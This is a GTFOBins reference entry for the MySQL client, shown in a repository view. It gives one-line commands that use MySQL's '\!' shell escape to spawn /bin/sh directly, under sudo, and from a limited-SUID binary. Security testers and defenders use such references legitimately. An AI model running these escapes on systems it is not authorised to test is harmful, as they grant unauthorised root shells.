1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 19:01:59 +02:00
GTFOBins.github.io/_gtfobins/mysql.md
2018-10-05 18:55:38 +01:00

11 lines
214 B
Markdown

---
description: A valid MySQL server must be available.
functions:
shell:
- code: mysql -e '\! /bin/sh'
sudo:
- code: sudo mysql -e '\! /bin/sh'
limited-suid:
- code: ./mysql -e '\! /bin/sh'
---